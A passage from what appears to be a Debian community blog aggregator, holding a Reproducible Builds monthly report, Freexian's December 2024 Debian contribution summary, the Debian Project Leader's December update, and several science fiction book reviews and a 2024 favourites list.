Last month saw the introduction of reproduce.debian.net. Announced at the recent Debian MiniDebConf in Toulouse, reproduce.debian.net is an instance of rebuilderd operated by the Reproducible Builds project. rebuilderd is our server designed to monitor the official package repositories of Linux distributions and attempt to reproduce the observed results there. This month, however, we are pleased to announce that not only does the service now produce graphs, the reproduce.debian.net homepage itself has become a start page of sorts, and the amd64.reproduce.debian.net and i386.reproduce.debian.net pages have emerged. The first of these rebuilds the amd64 architecture, naturally, but it is also building Debian packages that are marked with the "no architecture" label, all. The second builder is, however, only rebuilding the i386 architecture. Both of these services were also switched to reproduce the Debian trixie distribution instead of unstable, which started with 43% of the archive rebuilt, with 79.3% reproduced successfully. This is very much a work in progress, and we'll start reproducing Debian unstable soon. Our i386 hosts are very kindly sponsored by Infomaniak whilst the amd64 node is sponsored by OSUOSL; thank you! Indeed, we are looking for more workers for more Debian architectures; please contact us if you are able to help.

debian-repro-status
Reproducible builds developer kpcyrd has published a client program for reproduce.debian.net (see above) that queries the status of the locally installed packages and rates the system with a percentage score. This tool works analogously to arch-repro-status for the Arch Linux Reproducible Builds setup. The tool was packaged for Debian and is currently available in Debian trixie: it can be installed with apt install debian-repro-status.

On our mailing list
On our mailing list this month:
  • Bernhard M. Wiedemann wrote a detailed post on his long journey towards a bit-reproducible Emacs package. In his interesting message, Bernhard goes into depth about the tools that they used and the lower-level technical details of, for instance, compatibility with the version of glibc within openSUSE.
  • Shivanand Kunijadar posed a question pertaining to the reproducibility issues with encrypted images. Shivanand explains that they must use a random IV for encryption with AES CBC. The resulting artifact is not reproducible due to the random IV used. The message resulted in a handful of replies, hopefully helpful!
  • User Danilo posted an interesting question related to their attempts to achieve reproducible builds for Threema Desktop 2.0. The question resulted in a number of replies attempting to find the right combination of compiler and linker flags (for example).
  • Longstanding contributor David A. Wheeler wrote to our list announcing the release of the Census III of Free and Open Source Software: Application Libraries report written by Frank Nagle, Kate Powell, Richie Zitomer and David himself. As David writes in his message, the report attempts to answer the question "what is the most popular Free and Open Source Software (FOSS)?".
  • Lastly, kpcyrd followed-up to a post from September 2024 which mentioned their desire for someone to implement a "hashset of allowed module hashes that is generated during the kernel build and then embedded in the kernel image", thus enabling a deterministic and reproducible build. However, they are now reporting that "somebody implemented the hash-based allow list feature and submitted it to the Linux kernel mailing list". Like kpcyrd, we hope it gets merged.

Enhancing the Security of Software Supply Chains: Methods and Practices
Mehdi Keshani of the Delft University of Technology in the Netherlands has published their thesis on "Enhancing the Security of Software Supply Chains: Methods and Practices". Their introductory summary first begins with an outline of software supply chains and the importance of the Maven ecosystem before outlining the issues that it faces "that threaten its security and effectiveness". To address these:
First, we propose an automated approach for library reproducibility to enhance library security during the deployment phase. We then develop a scalable call graph generation technique to support various use cases, such as method-level vulnerability analysis and change impact analysis, which help mitigate security challenges within the ecosystem. Utilizing the generated call graphs, we explore the impact of libraries on their users. Finally, through empirical research and mining techniques, we investigate the current state of the Maven ecosystem, identify harmful practices, and propose recommendations to address them.
A PDF of Mehdi's entire thesis is available to download.

diffoscope
diffoscope is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues. This month, Chris Lamb made the following changes, including preparing and uploading versions 283 and 284 to Debian:
  • Update copyright years. [ ]
  • Update tests to support file 5.46. [ ][ ]
  • Simplify tests_quines.py::test_{differences,differences_deb} to simply use assert_diff and not mangle the test fixture. [ ]

Supply-chain attack in the Solana ecosystem
A significant supply-chain attack impacted Solana, an ecosystem for decentralised applications running on a blockchain. Hackers targeted the @solana/web3.js JavaScript library and embedded malicious code that extracted private keys and drained funds from cryptocurrency wallets. According to some reports, about $160,000 worth of assets were stolen, not including SOL tokens and other crypto assets.

Website updates
Similar to last month, there was a large number of changes made to our website this month, including:
  • Chris Lamb:
    • Make the landing page hero look nicer when the vertical height component of the viewport is restricted, not just the horizontal width.
    • Rename the "Buy-in" page to "Why Reproducible Builds?". [ ]
    • Removing the top black border. [ ][ ]
  • Holger Levsen:
  • hulkoba:
    • Remove the sidebar-type layout and move to a static navigation element. [ ][ ][ ][ ]
    • Create and merge a new "Success stories" page, which highlights the success stories of Reproducible Builds, showcasing real-world examples of projects shipping with verifiable, reproducible builds. These stories aim to enhance the technical resilience of the initiative by encouraging community involvement and inspiring new contributions. [ ]
    • Further changes to the homepage. [ ]
    • Remove the translation icon from the navigation bar. [ ]
    • Remove unused CSS styles pertaining to the sidebar. [ ]
    • Add sponsors to the global footer. [ ]
    • Add extra space on large screens on the Who page. [ ]
    • Hide the side navigation on small screens on the Documentation pages. [ ]

Debian changes
There were a significant number of reproducibility-related changes within Debian this month, including:
  • Santiago Vila uploaded version 0.11+nmu4 of the dh-buildinfo package. In this release, dh_buildinfo becomes a no-op, i.e. it no longer does anything beyond warning the developer that the dh-buildinfo package is now obsolete. In his upload, Santiago wrote that "We still want packages to drop their [dependency] on dh-buildinfo, but now they will immediately benefit from this change after a simple rebuild."
  • Holger Levsen filed Debian bug #1091550 requesting a rebuild of a number of packages that were built with a very old version of dpkg.
  • Fay Stegerman contributed to an extensive thread on the debian-devel development mailing list on the topic of "Supporting alternative zlib implementations". In particular, Fay wrote about her results experimenting with whether zlib-ng produces identical results or not.
  • kpcyrd uploaded a new rust-rebuilderd-worker, rust-derp, rust-in-toto and debian-repro-status to Debian, which passed successfully through the so-called NEW queue.
  • Gioele Barabucci filed a number of bugs against the debrebuild component/script of the devscripts package, including:
    • #1089087: Address a spurious extra subdirectory in the build path.
    • #1089201: Extra zero bytes added to .dynstr when rebuilding CMake projects.
    • #1089088: Some binNMUs have a 1-second offset in some timestamps.
  • Gioele Barabucci also filed a bug against the dh-r package to report that the Recommends and Suggests fields are missing from rebuilt R packages. At the time of writing, this bug has no patch and needs some help to make over 350 binary packages reproducible.
  • Lastly, 8 reviews of Debian packages were added, 11 were updated and 11 were removed this month adding to our knowledge about identified issues.

Other development news
In other ecosystem and distribution news:
  • Lastly, in openSUSE, Bernhard M. Wiedemann published another report for the distribution. There, Bernhard reports about the success of building "R-B-OS", a partial fork of openSUSE with only 100% bit-reproducible packages. This effort was sponsored by the NLNet NGI0 initiative.

Upstream patches
The Reproducible Builds project detects, dissects and attempts to fix as many currently-unreproducible packages as possible. We endeavour to send all of our patches upstream where appropriate. This month, we wrote a large number of such patches, including:

Reproducibility testing framework
The Reproducible Builds project operates a comprehensive testing framework running primarily at tests.reproducible-builds.org in order to check packages and other artifacts for reproducibility. In November, a number of changes were made by Holger Levsen, including:
  • reproduce.debian.net-related:
    • Add a new i386.reproduce.debian.net rebuilder. [ ][ ][ ][ ][ ][ ]
    • Make a number of updates to the documentation. [ ][ ][ ][ ][ ]
    • Run i386.reproduce.debian.net on a public port to allow external workers. [ ]
    • Add a link to the /api/v0/pkgs/list endpoint. [ ]
    • Add support for a statistics page. [ ][ ][ ][ ][ ][ ]
    • Limit build logs to 20 MiB and diffoscope output to 10 MiB. [ ]
    • Improve the frontpage. [ ][ ]
    • Explain that we're testing arch:any and arch:all on the amd64 architecture, but only arch:any on i386. [ ]
  • Misc:
    • Remove code for testing Arch Linux, which has moved to reproduce.archlinux.org. [ ][ ]
    • Don't install dstat on Jenkins nodes anymore as it's been removed from Debian trixie. [ ]
    • Prepare the infom08-i386 node to become another rebuilder. [ ]
    • Add debug date output for benchmarking the reproducible_pool_buildinfos.sh script. [ ]
    • Install installation-birthday everywhere. [ ]
    • Temporarily disable automatic updates of pool links on buildinfos.debian.net. [ ]
    • Install Recommends by default on Jenkins nodes. [ ]
    • Rename rebuilder_stats.py to rebuilderd_stats.py. [ ]
    • r.d.n/stats: minor formatting changes. [ ]
    • Install files under /etc/cron.d/ with the correct permissions. [ ]
Jochen Sprickerhof also made a number of changes. Lastly, Gioele Barabucci classified packages affected by the 1-second offset issue filed as Debian bug #1089088 [ ][ ][ ][ ], Chris Hofstaedtler updated the URL for Grml's dpkg.selections file [ ], Roland Clobus updated the Jenkins log parser to parse warnings from diffoscope [ ] and Mattia Rizzolo banned a number of bots and crawlers from the service [ ][ ].
If you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. However, you can get in touch with us via:

Freexian Collaborators: Debian Contributions: Tracker.debian.org updates, Salsa CI improvements, Coinstallable build-essential, Python 3.13 transition, Ruby 3.3 transition and more! (by Anupa Ann Joseph, Stefano Rivera)

Debian Contributions: 2024-12
Contributing to Debian is part of Freexian's mission. This article covers the latest achievements of Freexian and their collaborators. All of this is made possible by organizations subscribing to our Long Term Support contracts and consulting services.

Tracker.debian.org updates, by Raphaël Hertzog
Profiting from end-of-year vacations, Raphaël prepared for tracker.debian.org to be upgraded to Debian 12 bookworm by getting rid of the remnants of python3-django-jsonfield in the code (it was superseded by a Django-native field). Thanks to Philipp Kern from the Debian System Administrators team, the upgrade happened on December 23rd. Raphaël also improved distro-tracker to better deal with invalid Maintainer fields which recently caused multiple issues in the regular data updates (#1089985, MR 105). While working on this, he filed #1089648 asking dpkg tools to error out early when maintainers make such mistakes. Finally he provided feedback to multiple issues and merge requests (MR 106, issues #21, #76, #77); there seems to be a surge of interest in distro-tracker lately. It would be nice if those new contributors could stick around and help out with the significant backlog of issues (in the Debian BTS, in Salsa).

Salsa CI improvements, by Santiago Ruano Rincón
Given that the Debian buildd network now relies on sbuild using the unshare backend, and that Salsa CI's reproducibility testing needs to be reworked (#399), Santiago resumed the work for moving the build job to use sbuild. There was some related work a few months ago that was focused on sbuild with the schroot and the sudo backends, but those attempts were stalled for different reasons, including discussions around the convenience of the move (#296). However, using sbuild and unshare avoids all of the drawbacks that have been identified so far. Santiago is preparing two merge requests: !568 to introduce a new build image, and !569 that moves all the extract-source related tasks to the build job. As mentioned in the previous reports, this change will make it possible for more projects to use the pipeline to build the packages (see #195). Additional advantages of this change include a more optimal way to test if a package builds twice in a row: instead of actually building it twice, the Salsa CI pipeline will configure sbuild to check if the clean target of debian/rules correctly restores the source tree, saving some CPU cycles by avoiding one build. Also, the images related to Ubuntu won't be needed anymore, since the build job will create chroots for different distributions and vendors from a single common build image. This will save space in the container registry. More changes are to come, especially those related to handling projects that customize the pipeline and make use of the extract-source job.

Coinstallable build-essential, by Helmut Grohne
Building on the gcc-for-host work of last December, a notable patch turning build-essential Multi-Arch: same became feasible. Whilst the change is small, its implications and foundations are not. We still install crossbuild-essential-$ARCH for cross building and, due to a britney2 limitation, we cannot have it depend on the host's C library. As a result, there are workarounds in place for sbuild and pbuilder. In turning build-essential Multi-Arch: same, we may actually express these dependencies directly as we install build-essential:$ARCH instead. The crossbuild-essential-$ARCH packages will continue to be available as transitional dummy packages.

Python 3.13 transition, by Colin Watson and Stefano Rivera
Building on last month's work, Colin, Stefano, and other members of the Debian Python team fixed 3.13 compatibility bugs in many more packages, allowing 3.13 to now be a supported but non-default version in testing. The next stage will be to switch to it as the default version, which will start soon. Stefano did some test-rebuilds of packages that only build for the default Python 3 version, to find issues that will block the transition. The default version transition typically shakes out some more issues in applications that (unlike libraries) only test with the default Python version. Colin also fixed Sphinx 8.0 compatibility issues in many packages, which otherwise threatened to get in the way of this transition.

Ruby 3.3 transition, by Lucas Kanashiro
The Debian Ruby team decided to ship Ruby 3.3 in the next Debian release, and Lucas took the lead of the interpreter transition with the assistance of the rest of the team. In order to understand the impact of the new interpreter in the Ruby ecosystem, ruby-defaults was uploaded to experimental adding ruby3.3 as an alternative interpreter, and a mass rebuild of reverse dependencies was done here. Initially, a couple of hundred packages were failing to build; after many rounds of rebuilds, adjustments, and many uploads we are down to 30 package build failures. Of those, 21 packages were asked to be removed from testing and, for the other 9, bugs were filed. All the information to track this transition can be found here. Now, we are waiting for PHP 8.4 to finish to avoid any collision. Once it is done the Ruby 3.3 transition will start in unstable.

Miscellaneous contributions
  • Enrico Zini redesigned the way nm.debian.org stores historical audit logs and personal data backups.
  • Carles Pina submitted a new package (python-firebase-messaging) and prepared updates for python3-ring-doorbell.
  • Carles Pina developed po-debconf-manager further: better state transitions, automated assigning of translators and reviewers on edit, automatic updating of po header files, bug fixes, etc.
  • Carles Pina reviewed, submitted and followed up the debconf templates translation (more than 20 packages) and translated some packages (about 5).
  • Santiago continued to work on DebConf 25 organization-related tasks, including handling the logo survey and results. Stefano spent time on DebConf 25 too.
  • Santiago continued the exploratory work about linux livepatching with Emmanuel Arias. Santiago and Emmanuel found a challenge since kpatch won't fully support linux in trixie and newer, so they are exploring alternatives such as klp-build.
  • Helmut maintained the /usr-move transition, filing bugs in e.g. bubblewrap, e2fsprogs, libvpd-2.2-3, and pam-tmpdir and corresponding on related issues such as kexec-tools and live-build. The removal of the usrmerge package unfortunately broke debootstrap and was quickly reverted. Continued fallout is expected and will continue until trixie is released.
  • Helmut sent patches for 10 cross build failures and worked with Sandro Knauß on stuck Qt/KDE patches related to cross building.
  • Helmut continued to maintain rebootstrap removing the need to build gnu-efi in the process.
  • Helmut collaborated with Emanuele Rocca and Jochen Sprickerhof on an interesting adventure in diagnosing why gcc would FTBFS in recent sbuild.
  • Helmut proposed supporting build concurrency limits in coreutils's nproc. As it turns out, nproc is not a good place for this functionality.
  • Colin worked with Sandro Tosi and Andrej Shadura to finish resolving the multipart vs. python-multipart name conflict, as mentioned last month.
  • Colin upgraded 48 Python packages to new upstream versions, fixing four CVEs and a number of compatibility bugs with recent Python versions.
  • Colin issued an openssh bookworm update with a number of fixes that had accumulated over the last year, especially fixing GSS-API key exchange which had been quite broken in bookworm.
  • Stefano fixed a minor bug in debian-reimbursements that was disallowing combination PDFs containing JAL tickets, encoded in UTF-16.
  • Stefano uploaded a stable update to PyPy3 in bookworm, catching up with security issues resolved in cPython.
  • Stefano fixed a regression in the eventlet from his Python 3.13 porting patch.
  • Stefano continued discussing a forwarded patch (renaming the sysconfigdata module) with cPython upstream, ending in a decision to drop the patch from Debian. This will need some continued work.
  • Anupa participated in the Debian Publicity team meeting in December, which discussed the team activities done in 2024 and projects for 2025.

3 January 2025

Bits from Debian: Bits from the DPL

Dear Debian community, this is bits from DPL for December. Happy New Year 2025! Wishing everyone health, productivity, and a successful Debian release later in this year.
Strict ownership of packages
I'm glad my last bits sparked discussions about barriers between packages and contributors, summarized temporarily in some post on the debian-devel list. As one participant aptly put it, we need a way to visibly say, "I'll do the job until someone else steps up". Based on my experience with the Bug of the Day initiative, simplifying the process for engaging with packages would significantly help. Currently we have
  1. NMU: The Developers Reference outlines several preconditions for NMUs, explicitly stating, "Fixing cosmetic issues or changing the packaging style in NMUs is discouraged." This makes NMUs unsuitable for addressing package smells. However, I've seen NMUs used for tasks like switching to source format 3.0 or bumping the debhelper compat level. While it's technically possible to file a bug and then address it in an NMU, the process inherently limits the NMUer's flexibility to reduce package smells.
  2. Package Salvaging: This is another approach for working on someone else's packages, aligning with the process we often follow in the Bug of the Day initiative. The criteria for selecting packages typically indicate that the maintainer either lacks time to address open bugs, has lost interest, or is generally MIA.
Both options have drawbacks, so I'd welcome continued discussion on criteria for lowering the barriers to moving packages to Salsa and modernizing their packaging. These steps could enhance Debian overall and are generally welcomed by active maintainers. The discussion also highlighted that packages on Salsa are often maintained collaboratively, fostering the team-oriented atmosphere already established in several Debian teams.
Salsa Continuous Integration
As part of the ongoing discussion about package maintenance, I'm considering the suggestion to switch from the current opt-in model for Salsa CI to an opt-out approach. While I fully agree that human verification is necessary when the pipeline is activated, I believe the current option to enable CI is less visible than it should be. I'd welcome a more straightforward approach to improve access to better testing for what we push to Salsa.
Number of packages not on Salsa
In my campaign, I stated that I aimed to reduce the number of packages maintained outside Salsa to below 2,000. As of March 28, 2024, the count was 2,368. As of this writing, the count stands at 1,928 [1], so I consider this promise fulfilled. My thanks go out to everyone who contributed to this effort. Moving forward, I'd like to set a more ambitious goal for the remainder of my term and hope we can reduce the number to below 1,800.
[1] UDD query: SELECT DISTINCT count(*) FROM sources WHERE release = 'sid' and vcs_url not like '%salsa%';
Past and future events
Talk at MRI Together
In early December, I gave a short online talk, primarily focusing on my work with the Debian Med team. I also used my position as DPL to advocate for attracting more users and developers from the scientific research community.
FOSSASIA
I originally planned to attend FOSDEM this year. However, given the strong Debian presence there and the need for better representation at the FOSSASIA Summit, I decided to prioritize the latter. This aligns with my goal of improving geographic diversity. I also look forward to opportunities for inter-distribution discussions.
Debian team sprints
Debian Ruby Sprint
I approved the budget for the Debian Ruby Sprint, scheduled for January 2025 in Paris. If you're interested in contributing to the Ruby team, whether in person or online, consider reaching out to them. I'm sure any helping hand would be appreciated.
Debian Med sprint
There will also be a Debian Med sprint in Berlin in mid-February. As usual, you don't need to be an expert in biology or medicine; basic bug squashing skills are enough to contribute and enjoy the friendly atmosphere the Debian Med team fosters at their sprints. For those working in biology and medicine, we typically offer packaging support. Anyone interested in spending a weekend focused on impactful scientific work with Debian is warmly invited.
Again all the best for 2025
Andreas.

1 January 2025

Russ Allbery: Review: Driving the Deep

Review: Driving the Deep, by Suzanne Palmer
Series: Finder Chronicles #2
Publisher: DAW
Copyright: 2020
ISBN: 0-7564-1512-8
Format: Kindle
Pages: 426
Driving the Deep is science fiction, a sequel to Finder (not to be confused with Finders, Emma Bull's Finder, or the many other books and manga with the same title). It stands alone and you could start reading here, although there will be spoilers for the first book of the series. It's Suzanne Palmer's second novel. When Fergus Ferguson was fifteen, he stole his cousin's motorcycle to escape an abusive home, stashed it in a storage locker, and got the hell off of Earth. Nineteen years later, he's still paying for the storage locker and it's still bothering him that he never returned the motorcycle. His friends in the Shipyard orbiting Pluto convince him to go to Earth and resolve this ghost of his past, once and for all. Nothing for Fergus is ever that simple. When the key he's been carrying all these years fails to open the storage unit, he hacks it open, only to find no sign of his cousin's motorcycle. Instead, the unit is full of expensive storage crates containing paintings by artists like Van Gogh. They're obviously stolen. Presumably the paintings also explain the irate retired police officer who knocks him out and tries to arrest him, slightly after the urgent message from the Shipyard AI telling him his friends are under attack. Fergus does not stay arrested, a development that will not surprise readers of the previous book. He does end up with an obsessed and increasingly angry ex-cop named Zacker as an unwanted passenger. Fergus reluctantly cuts a deal with Zacker: assist him in finding out what happened to his friends, and Fergus will then go back to Earth and help track down the art thieves who shot Zacker's daughter. It will be some time before they get back to Earth. Fergus's friends have been abducted by skilled professionals. What faint clues he can track down point to Enceladus, a moon of Saturn with a vast subsurface ocean. One simulation test with a desperate and untrustworthy employer later, Fergus is now a newly-hired pilot of an underwater hauler. The trend in recent SFF genre novels has been towards big feelings and character-centric stories. Sometimes this comes in the form of found family, sometimes as melodrama, and often now as romance. I am in general a fan of this trend, particularly as a corrective to the endless engineer-with-a-wrench stories, wooden protagonists, and cardboard characters that plagued classic science fiction. But sometimes I want to read a twisty and intelligent plot navigated by a competent but understated protagonist and built around nifty science fiction ideas. That is exactly what Driving the Deep is, and I suspect this series is going to become my go-to recommendation for people who "just want a science fiction novel." I don't want to overstate this. Fergus is not a blank slate; he gets the benefit of the dramatic improvement in writing standards and characterization in SFF over the past thirty years. He's still struggling with what happened to him in Finder, and the ending of this book is rather emotional. But the overall plot structure is more like a thriller or a detective novel: there are places to go, people to investigate, bases to infiltrate, and captives to find, so the amount of time spent on emotional processing is necessarily limited. Fergus's emotions and characterization are grace notes around the edges of the plot, not its center. I thoroughly enjoyed this. Palmer has a light but effective touch with characterization and populates the story with interesting and distinguishable characters. 
The plot has a layered complexity that allows Fergus to keep making forward progress without running out of twists or getting repetitive. The motivations of the villains were not the most original, but they didn't need to be; the fun of the story is figuring out who the villains are and watching Fergus get out of impossible situations with the help of new friends. Finder was a solid first novel, but I thought Driving the Deep was a substantial improvement in both pacing and plot coherence. If I say a novel is standard science fiction, that sounds like criticism of lack of originality, but sometimes standard science fiction is exactly what I want to read. Not every book needs to do something wildly original or upend my understanding of story. I started reading science fiction because I loved tense adventures on moons of Saturn with intelligent spaceships and neat bits of technology, and they're even better with polished writing, quietly competent characterization, and an understated sense of humor. This is great stuff, and there are two more books already published that I'm now looking forward to. Highly recommended when you just want a science fiction novel. Followed by The Scavenger Door. Rating: 8 out of 10

31 December 2024

Chris Lamb: Favourites of 2024

Here are my favourite books and movies that I read and watched throughout 2024. It wasn't quite the stellar year for books that previous years were: few of those books that make you want to recommend and/or buy them for all your friends. In subconscious compensation, perhaps, I reread a few classics (e.g. True Grit, Solaris), and I've almost finished my second read of War and Peace.

Books

Elif Batuman: Either/Or (2022)
Stella Gibbons: Cold Comfort Farm (1932)
Michel Faber: Under The Skin (2000)
Wallace Stegner: Crossing to Safety (1987)
Gustave Flaubert: Madame Bovary (1857)
Rachel Cusk: Outline (2014)
Sara Gran: The Book of the Most Precious Substance (2022)
Anonymous: The Railway Traveller's Handy Book (1862)
Natalie Hodges: Uncommon Measure: A Journey Through Music, Performance, and the Science of Time (2022)
Gary K. Wolf: Who Censored Roger Rabbit? (1981)

Films

Recent releases

Seen at a 2023 festival. Disappointments this year included Blitz (Steve McQueen), Love Lies Bleeding (Rose Glass), The Room Next Door (Pedro Almodóvar) and Emilia Pérez (Jacques Audiard), whilst the worst new film this year was likely The Substance (Coralie Fargeat), followed by Megalopolis (Francis Ford Coppola), Unfrosted (Jerry Seinfeld) and Joker: Folie à Deux (Todd Phillips).
Older releases
i.e. films released before 2023, and not including rewatches from previous years. Distinctly unenjoyable watches included The Island of Dr. Moreau (John Frankenheimer, 1996), Southland Tales (Richard Kelly, 2006), Any Given Sunday (Oliver Stone, 1999) & The Hairdresser's Husband (Patrice Leconte, 1990). On the other hand, unforgettable cinema experiences this year included big-screen rewatches of Solaris (Andrei Tarkovsky, 1972), Blade Runner (Ridley Scott, 1982), Apocalypse Now (Francis Ford Coppola, 1979) and Die Hard (John McTiernan, 1988).

30 December 2024

Russ Allbery: Review: House in Hiding

Review: House in Hiding, by Jenny Schwartz
Series: Uncertain Sanctuary #2
Publisher: Jenny Schwartz
Copyright: October 2020
Printing: September 2024
ASIN: B0DBX6GP8Z
Format: Kindle
Pages: 196
House in Hiding is the second book of a self-published space fantasy trilogy that started with The House That Walked Between Worlds. I read it as part of the Uncertain Sanctuary omnibus, which is reflected in the sidebar metadata. At the end of the previous book, Kira had gathered a motley crew for her house and discovered that she had drawn the attention of some rather significant galactic powers. Now, with the help of her new (hopefully) friends, she has to decide what role she's going to play in the galaxy. Or she can dither a lot, ruminate repeatedly on the same topics, and flail about randomly. That's also an option. This is slightly unfair. By the second half of the book, the series plot is beginning to cohere around two major problems: what is happening to the magic flows in the universe, and who killed Kira's parents. But apparently there was a limit on my enjoyment for the chaos in Kira's chaotic decisiveness I praised in my review of the last book, and I hit that limit around the middle of this book. I am interested in the questions of ethics, responsibility, and public image that this series is raising. I'm just not convinced that Schwartz is going to provide satisfying answers. One thing I do appreciate about this book is that it acknowledges that politics exist and that taking powerful people at face value is a bad idea. You would think that this would be a low bar, and yet it's depressing how many fantasy novels signal the trustworthiness of a character via some variation of "I looked into his eyes and shook his hand," or at least expect readers to be surprised by the inevitable betrayals. Schwartz does not make that mistake; after getting a call from a powerful player in galactic politics, the characters take apart everything that was said while assuming it could be attempted manipulation, which is the correct initial response. My problem comes after that. I like reading about competent characters with a plan, and these are absurdly powerful but very naive characters with no plan. This is realistic for the situation Kira has been thrust into, but it's not that entertaining to read about. I think the root of my problem is that there are some fundamental storytelling problems here that Schwartz is struggling to fix. The basic theory of story says that you need a protagonist, a setting, a conflict, and a plot. Schwartz has a good protagonist, one great supporting character and several adequate ones, and an enjoyably weird setting. I think she's working her way up to having a plot, although usually it's best for the plot to show up before the middle book of the series. What she doesn't have is a meaningful conflict. It's not entirely clear to either the reader or to Kira why Kira cares about what's happening. You would not think this would be a problem given that Kira's parents were murdered before the start of the first book. That's a classic conflict that's driven more books than I think anyone could count. It's not what Kira has cared about up to this point, however; she got away from Earth and has shown no sign of wanting to go back or identify the people who killed her parents, perhaps because she mostly blames herself. Instead, she's stumbling across other problems in the universe that other people would like her to care about. She occasionally feels like she ought to care about them because they involve her new friends or because she wants to be a good person, but they have very little dramatic oomph. 
"I'm a sorcerer and vaguely want the universe to be a better place" turns out to not work that well as a source of dramatic tension. This lack of conflict is somewhat fascinating because it's so different than most fantasy novels. If Schwartz were more aware of how oddly disconnected her protagonist is from the story conflict, I think there could be a thoughtful, if odd, psychological novel in here about one's ethical responsibilities if one suddenly had vast power and no strong attachments to the world. Kira does gesture occasionally in that direction, but there's no real meat to her musings. Instead, her lack of motivation is solved through one of the hoariest tropes in fiction: children in danger. I really want to like this series, and I still love the House, but this book was not good. The romance that I was delighted to not be subjected to in the first book appears to be starting (sigh), the political maneuvering that happens here is only mildly interesting and not believably competent, and the book concludes in Kira making an egregiously and blatantly stupid mistake that should have resulted in one of her friends asking her what the hell she was doing. Some setup happens, and it seems likely that the final book will have a clear conflict and plot, but this middle book was a disappointing mess. These books are fast to read and lightly entertaining between other things, and the House still has me invested enough in this universe that I'll read the last book in the omnibus. Be warned, though, that the middle book is more a collection of anecdotes than a story, and there's only so much of Kira showing off her power I can take without a conflict and a plot. Followed by The House That Fought. Rating: 5 out of 10

29 December 2024

Russ Allbery: Review: The Last Hour Between Worlds

Review: The Last Hour Between Worlds, by Melissa Caruso
Series: The Echo Archives #1
Publisher: Orbit
Copyright: November 2024
ISBN: 0-316-30364-X
Format: Kindle
Pages: 388
The Last Hour Between Worlds is urban, somewhat political high fantasy with strong fae vibes. It is the first book of a series, but it stands alone quite well.

Kembral Thorne is a Hound, a member of the guild that serves as guards, investigators, and protectors. Kembral's specialty is Echo retrieval: rescues of people and animals who have fallen through a weak spot in reality into one of the strange, dangerous, and malleable layers called Echoes. Kem once rescued a dog from six layers down, an almost unheard-of feat.

Kem is also a new single mother, which means her past two months have been spent in a sleep-deprived haze revolving exclusively around her much-beloved infant. Dona Marjorie Swift's year-turning party is the first time she's been out without Emmi since she gave birth, and she's only there because her sister took the child and practically shoved her out the door. Now, she's desperately trying to remember how to be social and normal, which is not made easier by the unexpected presence of Rika at the party.

Rika Nonesuch is not a Hound. She's a Cat, a member of the guild of thieves and occasional assassins. They are the nemesis of the Hounds, but in a stylized and formalized way in which certain courtesies are expected. (The politics of this don't really make sense; you just have to go with it.) Kem has complicated feelings about Rika's grace, banter, and intoxicating perfume, feelings that she thought might be reciprocated until Rika drugged her during an apparent date and left her buried under a pile of garbage. She was not expecting Rika to be at this party and is definitely not ready to have a conversation with her.

This emotional turmoil is rudely interrupted by the death of nearly everyone at the party via an Echo poison, the appearance of a dark figure driving a black sword into someone, and the descent of the entire party into an Echo.

This was one of those books that kept getting better the farther I read. I was a bit leery at first because the publisher's blurb made it sound more like horror than I prefer, but this is more the disturbing strangeness of fae creatures than the sort of gruesomeness, disgust, or body horror that I find off-putting. Most importantly, the point of this book is not to torture the characters or scare the reader. It's instead structured a bit like a murder mystery, but one whose resolution requires working out obscure fantasy rules and hidden political agendas. One of the currencies in the world of Echoes is blood, but another is emotion, revelation, and the stories that bring both, and Caruso focuses the story more on that aspect than on horrifying imagery.
Rika frowned. "Resolve it? How?"

"I have no idea." I couldn't keep my frustration from leaking through. "Might be that we have to delve deep into our own hearts to confront the unhealed wounds we've carried with us in secret. Might be that we have to say their names backward, or just close our eyes and they'll go away. Echoes never make any damned sense."

Rika made a face. "We'd better not have to confront our unhealed wounds, or I'm leaving you to die."
All of The Last Hour Between Worlds is told in the first person from Kem's perspective, but Rika is the best character in this book. Kem is a rather straightforward, dogged, stubborn protector; Rika is complicated, selfish, conflicted, and considerably more dynamic. I spotted the first obvious twist in her background so long before Kem did that it was a bit frustrating, but there were multiple satisfying twists after that. As advertised in the blurb, there's a sapphic romance angle here, but it's the sort that comes from a complicated friendship and a lot of mutual respect rather than love at first sight. Some of their relationship conflict is driven by misunderstanding, but the misunderstanding happens before the novel begins, which means the reader doesn't have to sit through the bit where one yells at the characters for being stupid.

It helps that the characters have something concrete to do, and that driving plot problem is multi-layered and satisfying. Each time the party falls through a layer of reality, it's mostly reset to the start of the book, but the word "mostly" is hiding a lot of subtlety. Given the clock at the start of each chapter and the blurb (if one read it), the reader can make a good guess that the plot problem will not be fully resolved until the characters fall quite deep into the Echoes, but the story never felt repetitive the way that some time loop stories can. As the characters gain more understanding, the problems change, the players change, and they have to make several excursions into the surrounding world.

This is the sort of fantasy that feels a bit like science fiction. You're thrown into a world with a different culture and different rules that are foreign to the reader and natural to the characters. Part of the fun of reading is figuring out the rules, history, and backstory while watching the characters try to solve the puzzles they're faced with.

The writing is good but not great. Characterization was good enough for a story primarily focused on action and puzzle-solving, but it was a bit lacking in subtlety. I think Caruso's strengths showed most in the world design, particularly the magic system and the rules followed by the Echo creatures. The excursions outside of the somewhat-protected house struck a balance between eeriness and comprehensibility that reminded me of T. Kingfisher or Sandman. The human politics were unfortunately less successful and rested on some tired centrist cliches. Thankfully, this was not the main point of the story.

I should also warn that there is a lot of talk about babies. Kem's entire identity at the start of the novel, to the point of incessant monologue, is "new mother." This is not a perspective we get very often in fantasy, and Kem eventually finds a steadier balance between her bond with her daughter and the other parts of her life. I think some readers will feel very seen. But Caruso leans hard into maternal bonding. So hard. If you don't want to read about someone who is deliriously obsessed with their new child, you may want to skip this one.

Right after I finished this book, I thought it was amazing. Now that I've had a few days to think about it, the lack of subtlety and the facile human politics brought it down a notch.
I'm a science fiction reader at heart, so I loved the slow revelation of mechanics; the reader starts the story by knowing that Kem can "blink step" but not knowing what that means, and by the end of the story one not only knows but has opinions about its limitations, political implications, and interactions with other forms of magic. The Echo worlds are treated similarly, and this type of world-building is my jam. But the cost is that the human characters, particularly the supporting cast, don't get the same focus and therefore are a bit straightforward and obvious. The subplot with Dona Vandelle was particularly annoying. Ah well.

Kem and Rika's relationship did work, and it's the center of the book. If you like fantasy mechanics but are a bit leery of fae stories because they feel too symbolic or arbitrary, give this a try. It's the most satisfyingly constructed fae story that I've read in a long time. It's not great literary fiction, but it's also not trying to be; it's a puzzle adventure, and a well-executed one. Recommended, and I will definitely be reading the sequel.

